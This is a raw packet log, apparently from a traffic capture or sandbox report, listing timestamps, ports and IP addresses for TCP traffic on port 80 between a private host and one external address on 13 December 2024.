                                                                                                                                                                Dec 13, 2024 01:37:32.653676987 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.653687954 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.653736115 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.653770924 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.653781891 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.653812885 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.654652119 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.654942036 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.654983997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.655029058 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.655394077 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.655431032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.655440092 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.655471087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.656841993 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.656876087 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.656893969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.656917095 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.657129049 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.657162905 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.657176018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.657737970 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.657917023 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.657972097 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.796678066 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.796699047 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.796715975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.796786070 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.796819925 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.796962976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.798017979 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.798029900 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.798063040 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.798089027 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.798818111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.798830032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.798870087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.799343109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.799355984 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.799396038 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.800156116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.800354958 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.800359011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.801213026 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.801223993 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.801254034 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.801281929 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.802000999 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.802011967 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.802048922 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.802977085 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.802988052 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.803028107 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.803559065 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.803596973 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.803700924 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.804410934 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.804451942 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.804625988 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.805275917 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.805321932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.805342913 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.805378914 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.806071043 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.806166887 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.806209087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.807318926 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.807329893 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.807382107 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.808372974 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.808383942 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.808414936 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.808440924 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.808667898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.808705091 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.809432030 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.809468031 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.810808897 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.810821056 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.810832977 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.810844898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.810848951 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.810869932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.810889959 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.811391115 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.811402082 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.811443090 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.812565088 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.812577009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.812618971 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.812932014 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.812968969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.813779116 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.813788891 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.813824892 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.813985109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.814775944 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.814786911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.814816952 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.814827919 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.816128016 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.816138029 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.816180944 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.817194939 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.817204952 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.817214012 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.817240000 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.817250967 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.818969011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.819003105 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.819025040 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.819036961 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.819048882 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.819071054 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.819084883 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.819108009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.819112062 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.819150925 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.820533037 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.820576906 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.820600986 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.820641994 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.820713997 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.820749998 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.820763111 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.820791006 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.821607113 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.821657896 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.821674109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.821713924 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.822624922 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.822659969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.822678089 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.822701931 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.823203087 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.823246956 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.823293924 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.824300051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.824332952 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.824346066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.824373007 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.824841976 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.825155020 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.825200081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.825706959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.825932980 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.825982094 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.826587915 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.826630116 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.826679945 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.827354908 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.827435970 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.827477932 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.827524900 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.827568054 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.829165936 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.829199076 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.829211950 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.829294920 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.829318047 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.829355955 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.829360962 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.829396963 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.830274105 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.830315113 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.830326080 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.830354929 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.831341028 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.831376076 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.831423998 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.831641912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.831779003 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.831828117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.832571030 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.832614899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.838757992 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.838793039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.838859081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.839114904 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.839149952 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.839198112 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.840008974 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.840044022 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.840090036 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.840888023 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.840936899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.844842911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.844873905 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.844922066 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.844945908 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.844960928 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.844965935 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.846492052 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.846525908 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.846543074 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.846574068 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.846681118 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.846715927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.846762896 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.847558975 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.848424911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.848475933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.848563910 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.848618031 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.848663092 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.849360943 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.849397898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.849411011 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.849438906 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.849926949 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.850954056 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.939009905 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.939074993 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.939151049 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.953665972 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.989303112 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.989336967 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.989356041 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.989372969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.989391088 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.989499092 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.989535093 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.990382910 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.990417957 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.990444899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.990457058 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.991408110 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.991442919 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.991451025 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.991482973 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.992542982 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.992577076 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.992592096 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.992611885 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.992621899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.992646933 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.992652893 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.992687941 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.993594885 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.993629932 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.993653059 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.993674040 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.995172977 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.995206118 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.995229006 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.995249033 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.995356083 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.995389938 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.995403051 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.995430946 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.996881008 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.996913910 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.996932030 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.996948004 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.996961117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.996983051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.997006893 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.997040033 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.997957945 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.997992039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.998017073 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.998040915 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.998606920 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.998657942 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.998836040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.998893976 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.999383926 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.999433994 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:32.999438047 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:32.999483109 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.001188993 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.001221895 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.001247883 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.001255035 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.001260996 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.001290083 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.001302004 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.001331091 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.002285957 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.002321959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.002331972 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.002367973 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.003293991 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.003344059 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.003346920 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.003390074 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.004508018 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.004540920 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.004555941 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.004575968 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.004580975 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.004616976 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.005548000 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.005582094 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.005594969 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.005616903 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.005624056 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.005656004 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.006692886 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.006727934 CET8049753185.81.68.147192.168.2.5
